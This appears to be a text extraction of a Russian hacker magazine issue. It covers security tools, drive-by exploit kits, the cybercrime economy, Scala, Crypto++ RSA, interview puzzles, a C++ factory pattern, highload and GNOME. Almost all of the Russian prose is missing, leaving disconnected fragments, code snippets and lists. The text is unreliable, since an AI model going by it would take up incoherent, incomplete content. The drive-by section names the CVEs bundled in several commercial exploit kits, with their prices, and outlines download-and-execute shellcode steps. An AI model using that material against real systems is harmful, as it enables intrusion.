URL:
code.google.com/p/
ioctlfuzzer
:
Windows

:
Sebastian Porst
URL:
https://github.com/
sporst/SWFREtools
:
*nix/win

WINDOWS
IOCTL Fuzzer
Windows.
NtDeviceIoControlFile
IOCTL .
IOCTL-

.
:
GUI;
Windows 7;

:
Volatile Systems
URL:
https://www.
volatilesystems.com/
default/volatility
:
*nix/win/mac

64- Windows;
;

( IOCTL-
);
DbgCb;


;
/

.

:
Sebastian Weber
URL:
http-tunnel.sourceforge.net
:
win

FLASH

RAM

HTTP

SWFREtools Flash-. SOURCE Boston 2011 Sebastian Porst.




( )
SWF:
Flash Dissector (
SWF-);
SWF Parser (
);
Minimizer (
SWF-);
FP Debugger ( Flash
Player);
StatsGenerator (
SWF-).

Volatility ,
Python
(RAM).
,

, (,
). , :
;
;
;
DLL ;
;
;
;
;
;

.

HTTPTunnel,
, HTTP-,
HTTP GET- POST-.
, .
HTTP-,
HTTPTunnel ,
, telnet PPP,
. ,
:
Port mapping;
SOCKS4, SOCKS5;
;
- ;
;
standalone hosted-;
LDAP
MySQL.

, Flash,
:
, ;
;
;
, .
JHexView, splib Buggery.


,
,

Volatility.

:
,
, , . HTTP-

.
: PHP- - ,
Perl- win32-.


MALWARE

(drobotun@xakep.ru)

DRIVE-BY

WWW

-

DRIVE-BY
(
)
. ,
. !


drive-by ,
. , , , , , ,

CD-Man. ,
.
, , ,
. ,
,
iframe
, , JavaScript, .
, ,
.


-
- .
-
, ,
.
-

- ( )
.
API- URLDownloadToFile urlmon.dll,
.

- :
kernel32.dll
(
PEB);
kernel32.dll GetProcAddress;

www.exploitdb.com



.

wepawet.
iseclab.org.
,
,

,
-.

DVD


-
Malzilla.
.

API- LoadLibrary
GetProcAddress;
LoadLibrary urlmon.dll;
URLDownloadToFile
-
( WinExec
ShellExecute);

.



. , ,
- ,
,
.


drive-by -

JavaScript-

drive-by (: Google Anti-Malware Team)

- Exploit.HTML.IESlice.aa

Eleonore Exploit Kit

MDAC BlackHole Exploit Kit ( )

, . : ,
, -
.
(
-).
,

, - ,
. ,
, -
, ,


JavaScript-,
Rhino Script Engine Java (CVE-2011-3544)

,

( drive-by ,
, , ,
).
, ,

Adobe, Adobe
Reader, Java Oracle Corporation.
,
-
(, :))

Microsoft Data Access


Components (MDAC).
2006 , -
.

,
- :
Blackhole Exploit Kit;
Eleonore Exploit Kit;
Nuclear Pack;
Phoenix Exploits Kit;
Sakura Exploit Pack.
,


MALWARE

-
BlackHole Exploit Kit
.
malwaredomainlist.com
-. , 9097%
. , .
1.2.3, :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).

( ): 1500,
1000, 700, () 50, 20, 200,
500, 200, (24 ) 50.
.
( -

BlackHole Exploit Kit ( )

) CVE-2012-0507.
AtomicReferenceArray,
Object[],
JRE.

Eleonore Exploit Kit


2009 ,
. 1.8.91. :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2006-4704 (WMI Object Broker);
CVE-2008-2463 (MS08-041 MS Access Snapshot Viewer);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0806 (Internet Explorer DHTML Behaviors Use After Free);
CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2010-4452 (Java ClassLoader Remote Code Execution);
CVE-2011-0558 (Adobe Flash Player Integer Overflow);
CVE-2011-0559 (Adobe Flash Player Memory Corruption);
CVE-2011-0611 (Adobe Flash Player Embedded .swf file);
CVE-2011-2462 (Adobe Reader U3D Object Memory Corruption);
CVE-2011-3521 (Java Update);
CVE-2011-3544 (Java Rhino Script Engine).

( ) 1000 , 50,
50, (24 ) 40.


Eleonore Exploit Kit ( )


drive-by -

Nuclear Pack
( 2010 )
( 2012 ).
,
.
:

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2463 (MS08-041 MS Access Snapshot Viewer);
CVE-2008-2992 (Adobe Reader JavaScript Printf Buffer Overflow);
CVE-2008-4844 (Internet Explorer 7 XML Exploit);
CVE-2009-0075/0076 (MS09-002-IE7 Memory Corruption);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2009-1136 (IE OWC Spreadsheet ActiveX control Memory
Corruption);
CVE-2010-0188 (Adobe Reader LibTiff);

CVE-2010-0840 (Java OBE);


CVE-2010-1885 (Windows Help and Support Center Protocol Handler
Vulnerability);
CVE-2011-3544 (Java Rhino Script Engine).

900 ( ).
-
.
,
, ,
.
iframe,
OnMouseMove (
, ).

Phoenix Exploits Kit


-. 2009 .
-.
3.1. :

CVE-2006-0003 (Microsoft Data Access Components (MDAC));


CVE-2007-5659/2008-0655 (Adobe Reader Collab CollectEmailInfo);
CVE-2008-2992 (Adobe Reader Javascript Printf Buffer Overflow);
CVE-2008-5353 (JRECalendar Java Deserialize);
CVE-2009-0927 (Adobe Reader Collab GetIcon);
CVE-2009-3867 (Java GSB);
CVE-2009-4324 (Adobe Reader doc.media.newPlayer);
CVE-2010-0188 (Adobe Reader LibTiff);
CVE-2010-0886 (Java Deployment Toolkit Component);
CVE-2010-1240 (Adobe Reader Embedded EXE Social Engineering);
CVE-2010-1297 (Adobe Flash Player NewFunction Invalid Pointer Use);
CVE-2011-3544 (Java Rhino Script Engine);
CVE-2012-0507 (Java Atomic).

-, 2200 .

Phoenix Exploits Kit

Sakura Exploit Pack


. , ,
, . :
CVE-2006-0003 (Microsoft Data Access Components (MDAC));
CVE-2010-0806 (IEPeers Remote Code Execution);
CVE-2010-0842 (Java JRE MixerSequencer Invalid Array Index Remote
Code Execution Vulnerability);
CVE-2011-3544 (Java Rhino Script Engine).

, , , -
MDAC-. ,

Sakura Exploit Pack

Sakura Exploit Pack

, ,
, .
: 0-day-
- . ,
,
( , , ,
Java), : . z


MALWARE

Anonymous


,
, .
. , .
, , .

- .
, ,
. , , .

20- . 26
,
.

?
- ?
, ?
, ,
.

-. -
, .
, -
, . ,
,
. ,
,
. -
, ,
.
: , ,
, , .
- .
,
,
, .

,
MALWARE-
(
10 000 )
-,
. :
, - Big Tits ,
,
. K , , ,
. ,
-,
.
,
. ,
,
0 .
,

, ,
.
, -
-
. 10 000
.
,


-.
,
,
. ,
(
,
40% ).

,
,
.
, - .

.

,

,
.

. ,

.
, ,
,
.
,
-
.

(Cybercrime
to Cybercrime C2C).

DDoS-.
,
.

4
5


MALWARE
, BMW
X7.

,
.


- ,
.
, .
, .

, . .
-,
.
, , -
. -
. ,
,
,
,
,
.
, ,
. , 24 7
,
AV. , .
,
,
. , , .

-
.
. , , ,
SEO-.
,
.
,
: ,
,
.

, ,
. .

:
,
Group-IB

- -


.
: -


-.
.
.

,
.


:
. ,
.
, 273 (,

) . , , .
:

, . -

.
,

.
, ,
273,

272 ( ), .
: -

-. -
, ,
, -.
, ,
.
-
, ,
. ,


.
, -


, ,
.


,
. 50%,
. -
, .

.
,
( , , -, )
.
-,
.

, , , .
- 272 273. :
!
159 . . , , ,
.
:
-
, , .

-



, .
, , ,
?

.
. ,

. ,
,
, , .
, , :

,
.
,
.
, . ,
- ,
.

,
. , , ,

- . ,
. ,

, , -

, . ,
,

159- .
-
.
. .
,
,
. -,

. , .
. - . ,
, . -
.
, ,
-,

.
.

,
. -
-.
, 50%
.
,

,
. ,
.
-.

. ,

-
.


MALWARE






,

.
, . , -
,
EULA. ,
,
.

, .
,
, -, , .

,
, .

.
,
, .


C2C?

10 000 .
, , -
. :
- 272 273. .
159- . .

INFO



:

,

.

,
, SuperWinAntivir ,
.
,
,
.
- . ,
.
, , .
, ,
.
.
, , ,
.
, .

,
.
, .


, , , IT.

.
- .
, .
, , ,
14 , .
, ,
, , Facebook Twitter, , ,
. z


Preview

94

HIGHLOAD
,
? , !
, ,
Highload.
-,
,

,
,
Facebook.
, , ,
.

76

SCALA-
JVM, Java
.
, Scala.

Highload

UNIXOID

106


, ,

suckless.org.

SYN/ACK

110


, ,
Android

Google ?

FERRUM

116


, UTM
,
, ,

, UTM.

128


FAQ Microsoft,
,
.

134

!
?
Intel X79 Express!


(twitter.com/ojowoo)

SCALA

SCALA

,


Scala ,
Java
,
, - ,

.

.

SCALA-

JVM?
JVM (Java Virtual Machine), ,
IT-. Java
. JVM . Scala
- , IT .
EPFL,
Scala , .
Scala ,
Java , , ,
,
, .
:
1. Java Virtual Machine, Java- ,
.NET LLVM.
2. Java , .
3. ,
.
4. -
, .

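// Sum of the numbers from 1 to 100
(1 to 100).sum
// Yields the string "2,6"
List(1, 2, 3).filter(_ % 2 == 1).map(_ * 2).mkString(",")
// Count the numbers whose digits sum to 42,
// processing the range in parallel
(1 to 1000000).par.count(_.toString.map(_.asDigit).sum == 42)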
// "" : trait (
// ), - ,
// "this"
trait MyFunction[-A, +B] extends (A => B)
with Logging with Validation {
this: MyContext =>
}


Scala , ,
Generic Java, -
Java 1.5.
-
,
. Scala 2001 , 2003-
,
,
.
, ,
, Foursquare, Twitter, LinkedIn .

-
JVM .


Scala IDE Eclipse Scala

2011
Typesafe,
Scala-.
Typesafe Stack, , ,
SBT,
Scala IDE, - Play Akka.
.


, Scala.
,
, .
:
val list = List("a", "b", "c")//List[String]
val map = Map(1 -> "a", 2 -> "b", 3 -> "c")//Map[Int, String]

case classes, equals, hashCode, toString :


case class User(name: String, age: Int, address: Address)
case class Address(city: String, street: String)
val p = User("Vasia", 21, Address("Moscow", "Arbat"))

(
, ,
):
// : BitSet(2, 4, 6),
BitSet(1, 2, 3).map(_ * 2)
// : Set("2", "3", "1"),
// Set, BitSet
BitSet(1, 2, 3).map(_.toString)
// : Map, 1 100



//
(1 to 100).groupBy(_.toString.map(_.asDigit).sum)

, ,
,
:
val i = "1".toInt // "1" java.lang.String
val date = today + 1.month + 5.days
println("%s - %d".format("Vasia", 21))

(tuples) :
def error = ("Not found", 404)
//
val (msg, code) = error
//


Java-
:
def box(width: Int = 100, height: Int = 200) = { /*...*/ }
box(height = 300) // box(100, 300)

:
lazy val data = ParseHugeFile()
//

, ( ,
):
def debug(msg: => String) = if (debugEnabled) println(msg)
// heavyMethod , debugEnabled
debug("Debug message: " + heavyMethod())

(
):
def closeResource(resource: { def close() })
{ resource.close() }

(pattern matching)

, :
val timeRegex = "(\\d{2}):(\\d{2}):(\\d{2})".r
someVar match {



,
,

JAVA-

case timeRegex(hh, mm, ss) => println(hh, mm, ss)


case List(a, List(1, b)) => println(a, b)
case _ => // default
}

, ,
, Scala . ,
,
Programming
in Scala (2nd edition). stackoverflow.com
google-.
, Scala
.

?

. Scala- Lift.

- Wicket, Rails, Django .
, . ,
, Lift, . ,
Foursquare, PHP
Lift, . , ,
, ,
.
, ,
,
- (Play) Scala-
, Lift, , .
- Play, , Typesafe Stack :
,
(Working hard to keep it simple).
Java--, . ,
, , - Java,
.
Scala,
, ,
, Play, Java.
. , , , ,
, .
, Play stateless-
, .
Scala- Akka
.
Typesafe Stack 2.0 , . Akka
Erlang ,
Actor, . ,
STM (Software Transactional
Memory),
, -


SCALA-

, deadlock
. , Dataflow Concurrency,
, .
Actor Akka ,
,
Actor
.
,

,
. Actor , , .
,
.
, Scala . Twitter
Foursquare.
,
, ,
( Play Akka) Java-.

,
,
. milestone-

Scala 2.10,
,
. , ,
, ,
. Scala-
Nemerle,
, ,
.
, Scala,
.

( ),
,
.

, , , Microsoft LINQ. Scala
Dynamic, (
), trait ,

. ,
3.0,
, 3,
, ,
, ,
.
, . z

PAUL PHILLIPS AKA DOT-COM


: ( ) Scala ,
Dot-Com.
( ) ,
, - .
Scala,
.
Typesafe , ,
.

SCALA DAYS 2012



Scala-, 500
.
Barbican .


12-
Scala . ,

. , Scala-
, . indeed.com,
Scala- 2011 .
Play Scala IDE


fft24




CRYPTO++ RSA


,
(
)

,
.
,

Crypto++,

RawRSA .

RSA


. , ,

, , ( ).
RSA,
, - .

, ,
(, Python)
. , Crypto++.


Crypto++
Integer,
WORD, , ( ). Crypto++ ,
, ,
, . :
,
.


).
, . Cryptopp ,
,
,
,

.
, ,
:

int CRYPTOPP_FASTCALL Baseline_Add(
    size_t N,
    word *C,         // result
    const word *A,   // operand A
    const word *B)   // operand B
{
    assert (N%2 == 0);   // N must be an even number of words
    Declare2Words(u);    // u is a double-word accumulator
    AssignWord(u, 0);    // clear u
    for (size_t i=0; i<N; i+=2)
    {
        AddWithCarry(u, A[i], B[i]);
        C[i] = LowWord(u);
        AddWithCarry(u, A[i+1], B[i+1]);
        C[i+1] = LowWord(u);
    }
    return int(GetCarry(u));
}


,
friend- PositiveSubstract
PositiveAdd.
. .


,
, Toom Cook
.
,
O(n^2)
, O(n^1,5849), .
Crypto++
.

void RecursiveMultiply(
    word *R,
    word *T,
    const word *A,
    const word *B,
    size_t N)
{
    // Recursion exit condition: small operands
    // (< 8) are multiplied directly
    if (N <= s_recursionLimit)
        s_pMul[N/4](R, A, B);
    else
    {
        // Split the operands into halves (A = A0 + A1*x)
        ...
        // R holds the result as four blocks
        // of N/2 words each (R[0123])
        // R[23] = A1*B1
        RecursiveMultiply(R2, T2, A1, B1, N2);
        // T[01] = (A1-A0)*(B0-B1)
        RecursiveMultiply(T0, T2, R0, R1, N2);
        // R[01] = A0*B0
        RecursiveMultiply(R0, T2, A0, B0, N2);
        // Combine the three partial products,
        // keeping track of the carries
        int c2 = Add(R2, R2, R1, N2);
        int c3 = c2;
        c2 += Add(R1, R2, R0, N2);
        c3 += Add(R2, R2, R3, N2);
        if (AN2 == BN2)
            c3 -= Subtract(R1, R1, T0, N);
        else
            c3 += Add(R1, R1, T0, N);
        c3 += Increment(R2, N2, c2);
        assert (c3 >= 0 && c3 <= 2);
        Increment(R3, N2, c3);
    }
}

(a + bx)(c + dx) = ac + (ac + bd - (a - b)(c - d))x + bdx^2

. A
A = A0 + 2^(N/2)*A1 ( N
N/2 ), A0*B0, A1*B1, (A0-A1)*(B0-B1).
.
N N/2
/, (

RSA,
6 ( p N)

,
,

OAEP, Timing attack

OAEP



(
: goo.gl/rAAkE).


.
, ( ). : m e,
e=(e[k], e[k-1], ...,
e[0]) = e[k]*2^k + ... + e[1]*2 + e[0].
:
s[1] = m
for i = 1,2,...,k
    s[i+1] = (s[i]^2)*m^(e[k-i])

, ,
n, O(log n).

(
). Crypto++
,
, .

(goo.gl/qkZpi).

RSA
RSA 1980- : (Ronald Linn Rivest),
(Adi Shamir) (Leonard Adleman). RSA
. RSA (one-way trapdoor
function), , ,
() . RSA trapdoor function
:
x -> x^e mod N

N = p*q .

RAWRSA
, RSA, RawRSA.
-
( ), - ,
. RawRSA
RSA-OAEP, RSA-OAEP+,
RSA-SAEP+ . RawRSA
: p q,
N=p*q,
p(N) = (p-1)(q-1).
e d, , e*d = 1 mod p(N).
(e, N) , (d, N) . (d,
p, q). m (1 <= m < N) (e, N) :
s = m^e mod N

s (d, N) -


m
:
m = s^d mod N

RAWRSA
/
RawRSA
Crypto++ (RawRSA
). :
// Returns by value: ApplyFunction yields a temporary Integer
Integer RawRsaEncrypt(Integer& m, Integer& N, Integer& e)
{
    RSA::PublicKey pubKey;
    pubKey.Initialize(N, e);
    return (pubKey.ApplyFunction(m));
}

, . :
// Returns by value: CalculateInverse yields a temporary Integer
Integer RawRsaDecrypt(Integer& s, Integer& N,
                      Integer& e, Integer& d)
{
    RSA::PrivateKey privKey;
    AutoSeededRandomPool prng;
    privKey.Initialize(N, e, d);
    return (privKey.CalculateInverse(prng, s));
}

, RawRSA: s (
) d N,
e s N. CalculateInverse
, ,
d, e, p, q. ,
, p q,
, N
Initialize ( e d).

RSA-OAEP
, RawRSA
, 1994
(Mihir Bellare)
(Phillip Rogaway) RSA, OAEP Optimal
Asymmetric Encryption Padding.
PKCS#1 ( v2.0)
.
, ,
.

, ,

. :
,
,
.

. RSA-OAEP

. RSA-OAEP
RawRSA .
RSA-OAEP (, AES 128 ) , N,
:



m || 01 || 00000... || rand

rand . H G :
((m || 01 || 00000...) xor rand H(rand)) ||
(rand xor G(msg || 01 || 00...))

RawRSA. - H G
SHA-256, . RSA-OAEP,
AES, RSAES-OAEP
Crypto++ RSAES_OAEP_Encryptor RSAES_OAEP_Decryptor,
.
, :
// Generate the key pair
AutoSeededRandomPool rng;
InvertibleRSAFunction parameters;
parameters.GenerateRandomWithKeySize( rng, 1536 );
RSA::PrivateKey privateKey( parameters );
RSA::PublicKey publicKey( parameters );

// 128-bit secret
static const int SECRET_SIZE = 16;
SecByteBlock plaintext( SECRET_SIZE );
memset( plaintext, 'A', SECRET_SIZE );
RSAES_OAEP_SHA_Encryptor encryptor( publicKey );

// Allocate a buffer for the ciphertext
size_t ecl = encryptor.CiphertextLength(plaintext.size());
SecByteBlock ciphertext( ecl );

// Encrypt
encryptor.Encrypt( rng,
    plaintext,
    plaintext.size(),
    ciphertext );
RSAES_OAEP_SHA_Decryptor decryptor( privateKey );
// Allocate a buffer for the recovered plaintext
size_t dpl = decryptor.MaxPlaintextLength(
    ciphertext.size() );
SecByteBlock recovered( dpl );
DecodingResult result = decryptor.Decrypt( rng,
    ciphertext, ciphertext.size(), recovered );

, .
, Crypto++ ,
.

Cryptopp,
, RSA. ,
Cryptopp
, , , . z

INFO

RSA

N.

.

.
( N),
m^e < N, mod
N,
e m^e
.
e = 2^16 + 1.
,
d,
, ,
(Michael J. Wiener).
RSA d < N^0,25.
Timing-,
, ,
,
d.
(Paul Kocher) 1999
RSA -.
,
.
Power attack.

1
2


Fault attack RSA.



,
.
N,
. ,

, 15%
, .
.
RSA
,
seed. -
p q
,
N1 N2 .
(Nadia Heninger) (Arjen Lenstra)
,
N 0,4%
HTTPS-.
.

p q,
,
.




.
PKCS Public
Key Cryptography
Standard
,

RSA Data
Security.


(ivinside.blogspot.com)
(alex@skazo4neg.ru)


,

.
<Enter>,
Java, Python Linux. !

1
,
( <Enter>
)?
<Enter> , !
(
),
, - .
,

. ,
<Enter> .
. ,
. IP-
. DNS, DNS- , IP
site.ru,
.
(http://site.ru) (site.ru:81),
80- HTTP-.
, :


$ telnet site.ru 80
GET / HTTP/1.1
Host: site.ru

GET
site.ru. , , User-Agent, Accept, Connection .
Live HTTP Headers Firefox,
. , HTTP/1.1
200 Ok , , .

2
access- -,
..
[10/Jul/2010:00:13:18 +0400] pogoda.yandex.ru 2.2.2.2 "GET
/chernigov HTTP/1.1" 200 "http://www.yandex.ua/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;
Trident/4.0)" 113
[10/Jul/2010:00:13:19 +0400] pogoda.yandex.ru 3.3.3.3 "GET
/russia HTTP/1.1" 200 "http://pogoda.yandex.ru/27612/
choose/" "Opera/9.52 (Windows NT 6.0; U; MRA 5.5
(build 02842); ru)" 119
[10/Jul/2010:00:13:20 +0400] pogoda.yandex.ru 5.5.5.6 "GET
/ HTTP/1.1" 302 "http://www.yandex.ru/"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729;
.NET CLR 3.0.30729; InfoPath.2)" 203

, ,
:
1. -3 , (/) (/moscow),
;
2. 95% ( )
(/kiev).

1. Linux.
,
, (/)
(/moscow).
: GET / HTTP/1.1 GET /moscow HTTP/1.1.
egrep, , | ().
. ,
,
( , access.log ,
,
User-Agent, ,
).
,
User-Agent. cut ( awk, sed).
,
. sort uniq. ,
, .
, head

.
-:
egrep 'GET / HTTP/1.1|GET /moscow HTTP/1.1' ./access.log \
| cut -d ' ' -f 9 | sort | uniq -c | sort -rn | head -3

2. , Python:
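timelist = []
# Read the access log line by line
for line in open('access.log'):
    # Keep only requests for /kiev
    if 'GET /kiev HTTP/1.1' in line:
        # Split the record into space-separated fields
        fields = line.split(' ')
        # The time value is the last field; store it as a number
        timelist.append(float(fields[-1].strip()))
# Sort numerically (sorting the raw strings would put "113" before "99")
timelist.sort()
# Take the element at 95% of the sorted list: the time
# that 95% of the requests fit into
print(timelist[int(len(timelist) * 0.95)])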

3
Java lock-free BigInteger next(), . .
.
0, 1, 1, 2, 3,
5, 8, 13, ...,
.
F(n)
F(0) = 0, F(1) = 1, F(n) = F(n - 1) + F(n - 2), n >= 2

, F(n 1) F(n 2) , , . (synchronized


java.util.concurrent.locks.Lock),
lock-free-. , lockfree- ,
. ,
, , ,
, , .
.
:
1. .
2. .
3. CAS
(compareAndSwap/compareAndSet) .
4. 1.
,
- .

compareAndSwap ( ),
:



boolean compareAndSet(int store,
                      int expected,
                      int newValue)
{
    if (store == expected) {
        store = newValue;
        return true;
    } else {
        return false;
    }
}

,
( , store, ).
Java , .
1.5 Java java.util.concurrent.atomic, AtomicBoolean,
AtomicInteger ; , CAS (compareAndSet,
incrementAndGet ).
AtomicBigInteger, , (F(n 1), F(n 2)) . ,
,
, AtomicReference
.
import java.math.BigInteger;
import java.util.concurrent.atomic.AtomicReference;

public class LockFreeFib {
    // Immutable holder for the pair F(n - 1), F(n - 2)
    private static class PrevFibNumbers {
        // Both fields are final, so an instance never changes
        // after it has been constructed
        private final BigInteger currentNumber;
        private final BigInteger prevNumber;
        protected PrevFibNumbers(BigInteger currentNumber,
                                 BigInteger prevNumber) {
            super();
            this.currentNumber = currentNumber;
            this.prevNumber = prevNumber;
        }
        // Computes the next pair and returns it
        // as a new PrevFibNumbers object
        public PrevFibNumbers calculateNext() {
            return new PrevFibNumbers(
                currentNumber.add(prevNumber), currentNumber);
        }
    }
    private AtomicReference<PrevFibNumbers> state =
        new AtomicReference<PrevFibNumbers>(
            new PrevFibNumbers(BigInteger.ONE, BigInteger.ZERO));
    /*
     * Returns the next Fibonacci number;
     * safe to call from several threads at once
     */
    public BigInteger next() {
        PrevFibNumbers current = null;
        PrevFibNumbers next = null;
        do {
            // 1. Read the current state
            current = state.get();
            // 2. Compute the next state
            next = current.calculateNext();
            // 3. Try to publish the new state
            //    with a CAS operation
            // 4. If another thread got there first, go back to step 1
        } while(!state.compareAndSet(current, next));
        // Return the number that this call
        // has claimed
        return current.prevNumber;
    }
}


, ,
, . CAS
( ) ,
- .

4
,
.
, ,
. 100 , 99 101 . , , , .
. ?
,
, . : .
, , , .
,
100 , .
: 100 , 99 .
,
. : 99 .
: 99
. : . z


1. ,
.
. ,
?
2. 100 . 99%.
98%. ?
: , , , /. .
3. -
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?
4. ,
?


deeonis (deeonis@gmail.com)





- .
,

. ,
?

.
.


, ,
, .

. ,
.
, , , .
, , .


class User
{
public:
    User(string login, string password)
        : m_login(login), m_password(password)
    {
    };
    ~User() {}
    string getLogin() { return m_login; }
    string getPassword() { return m_password; }
    void setLogin(string login) { m_login = login; }
    void setPassword(string password) { m_password = password; }
    // ...
private:
    string m_login;
    string m_password;
};


. User , login, password .


,
. , , , ,
.
, , .
, ,
, ,
, ,
.
, ,
- AdminUser. .

class AdminUser
{
public:
    AdminUser(string login, string password)
        : m_login(login), m_password(password)
    {};
    ~AdminUser() {}
    // getXXX and setXXX accessors,
    // the same as in User
    // ...
private:
    string m_login;
    string m_password;
};


class UserBase
{
public:
    UserBase(string login, string password)
        : m_login(login), m_password(password)
    {
    };
    virtual ~UserBase() {}
    virtual string getLogin() { return m_login; }
    virtual string getPassword() { return m_password; }


AdminUser,
User. , ,
, ,
.

const int SIMPLE_USER = 1;
const int ADMIN_USER = 2;
int userType;
string login;
string password;
// userType, login, password
//
if (userType == SIMPLE_USER)
{
User user(login, password);
}
else if (userType == ADMIN_USER)
{
AdminUser user(login, password);
}

,
,
.
.
BaseUser ,
. ,
.

    virtual void setLogin(string login) { m_login = login; }
    virtual void setPassword(string password) {
        m_password = password; }
    // ...
private:
    string m_login;
    string m_password;
};
class User : public UserBase
{
public:
    User(string login, string password)
        : UserBase(login, password)
    {
    };
    virtual ~User() {}
    // Class-specific members go here
};
class AdminUser : public UserBase
{
public:
AdminUser(string login, string password)
: UserBase(login, password)
{
};
virtual ~AdminUser();



(AdminUser, User )
. ,
. -
. , .
.
-
,
. ,
, . .

class UserFactory
{
public:
    // ...
    UserBase* createUser(int userType, string login,
                         string password)
    {
        // Stays nullptr when userType is not a known type
        UserBase *user = nullptr;
        switch (userType)
        {
        case ADMIN_USER:
            user = new AdminUser(login, password);
            break;
        case SIMPLE_USER:
            user = new User(login, password);
            break;
        }
        return user;
    }
};
Python

    // Class-specific members go here
};
//
UserBase *user;
if (userType == SIMPLE_USER)
{
user = new User(login, password);
}
else if (userType == ADMIN_USER)
{
user = new AdminUser(login, password);
}

.
- ,
. -,
- .

,
, . .
,
,
, -, , . , , .
,


, ? UserFactory,
-
createUser(). ,
, , .
, , .
createUser() .
.
.
.
.
.
. ,
. ,
, .

// createUser() returns a pointer to the base class
UserBase *admin;
UserFactory uf;
admin = uf.createUser(ADMIN_USER, login, password);

.
. ,
- ,
. z


. 1

,
, , ,

.
-
. , , , , ,
, .
,
, , ,
,
.


-
, ,
.
-.
.
,
, ,
, -
.

CommuniGate Pro. ,
.
,
.
, -
.
.
. ,
.
.
, ,
- . .


, ,
Facebook. . ,

. ,
(, ,
, ) ,
.
.
,
:
? ,
?
, ,
,
Amazon. ,

.
,
: ! Amazon

-,
cloud-.
-
,
:
,
Amazon, ,
?

- -

.
,

,
,
.
. ,
,
.
, .
.
- , ,
. , ,
,
-
, ,
.
,
.
, ,
, PHP. ,
CGI script - .
, CGI script
,
.
- ,

: ,
. API -


, ,
,


.

,
,
,
,
.

.

, ,
. , ,
,

.

, .


.
,
-

.
:
,
, ,

.
: REST API HTTP
.
,
.
: Erlyvideo,

.
Erlang.

, ,


,
: . ? ,

, ,

.
-.

-
. ,
.
,
, . .
Google
.
- :
?

?, , ,
: .
big data,
.
,
.
,

,
,
.
.
,
,
Google+. -


. 1

,
,
.
Facebook, Google, . , ,
, ,
-. .
? - -
. , , ,
, .
, , , , ,
.
,
, .
- , , ,
, .
, , . -,
.
.
,
, , ,
, ,

. , DYNAMODB
AMAZON


.
,
,
: !

(, ,
-
),
,
,

.

Facebook, , -,
- ejabberd-.

.
,
.
,
,
. ,
:
100 .
, .

, ,
,

,
,

.
, .

,
,
, 20. ,
,
,
,
,
,
.


.
,



. -
,

. , DynamoDB
Amazon
. DynamoDB Cassandra, Hadoop .
, ,
DynamoDB, .
, . Google
- . ,
,
, , DeNA ()
.
, .
- , ,
, Not invented here.

, - .
, Google Translate ,
-, ,
. Microsoft,
.
.
. ,
, ,
, ,
. ,
, , big data
web scale, ,
usability, .
, .


,
.

.

, .
,
.

,
, ,

. ,
Stack Overflow.
.
,
? ,
, ,
, , . -
.

,
.
.
,


. ?


. ,
. , ,
,
. .
?

. .
- .
, .
, .
, .
.


. 1

, ,
, - . -
.
,
, . , ,
. , - ,
,
cron .
, ,
.


,
. , .
, - .
.
, ,
,
( , ). ,
( ), .
,
, , , , , , .
, , - .
, , , .
, ,
. ,
. .
, . z

HIGHLOAD-

Highload.


,

-.

HighLoad++ (www.highload.ru).
,
,


.


.


,


MySQL,
. MySQL
.
MySQL 5.5.
Mail.Ru
NoSQL Tarantool, 500600
.
open-source
.

,
,

.
Erlyvideo
(erlyvideo.org). , .

.

, ( ,
Mail.Ru). ,

60 .

-

.
,

,
.
-

, ,
-
.


1
1.
1.1.
1.2.
2.

4

:

-

2.1.
2.2.
2.3.

3.

2
4.
4.1.
4.1.1.
4.1.1.1.
4.1.2.
4.1.3.
4.2.
4.3.
4.4.


,

CDN




Heartbeat, CARP-

3
5.
5.1.
5.2.
5.2.1.
5.2.2.
5.2.3.
5.2.4.
5.3.
5.3.1.
5.3.2.
5.3.3.
5.4.
5.5.

100


Share-nothing

6.
6.1.
6.2.
6.3.

5
7.
7.1.
7.2.
7.3.
7.3.1.
7.3.2.
7.3.3.
7.4.
7.5.
7.6.
7.6.1.
7.7.
7.8.



(, NoSQL)

6
8.
8.1.
8.2.
8.3.

9.
9.1.

Dev-ops ( )

9.2.
9.3.
10.
10.1.
10.2.
10.3.




Push- (, ,
)


UNIXOID

GNOME: GTK+
SHELL
GNOME ,
, .
, GNOME ,

.

(execbit.ru)

GNOME 1997 KDE,


Qt.

, KDE, 2000 Qt , GNOME
.
Linux. GNOME
, Ubuntu, Fedora,
OpenSUSE, .
, 3.0,
, , GNOME ,

.
UNIX ?
.

GNOME .
,
. GNOME
GTK ;
, CORBA,
D-Bus;
;
,
GNOME 3.

GNOME
. ,
KDE, GNOME

, , . , GNOME GTK,
Gimp,

Metacity,


-
GStreamer, , , ffmpeg. Firefox

Epiphany.
GNOME

,

.
,
, libgnome .

,
, ,
.
GNOME
,

.
,

.


GNOME
,
, .

,
GLib, GObject, libgnome, D-Bus
GVFS. GNOME,
.

GLib,
libc. GLib
,

. ,
,
,
, , , .ini-
.
GLib
GTK+,
,

. ,
GLib MC.
GLib
GNOME GObject.
(),
GNOME, GTK+.
GObject
( ),
, ,
.
GLib GObject
libgnome,
,

.
GLib-
, , ,
.
,
GLib
, GNOME.
GNOME
D-Bus,
. D-Bus


freedesktop.org UNIX. D-Bus
RCP CORBA,


GNOME ,
DCOP, KDE 3.
D-Bus
Linux-,
udev,
.
D-Bus GNOME
GVFS,
, FUSE.
GVFS , API GIO
. GVFS GIO ,
FTP- SMB-.
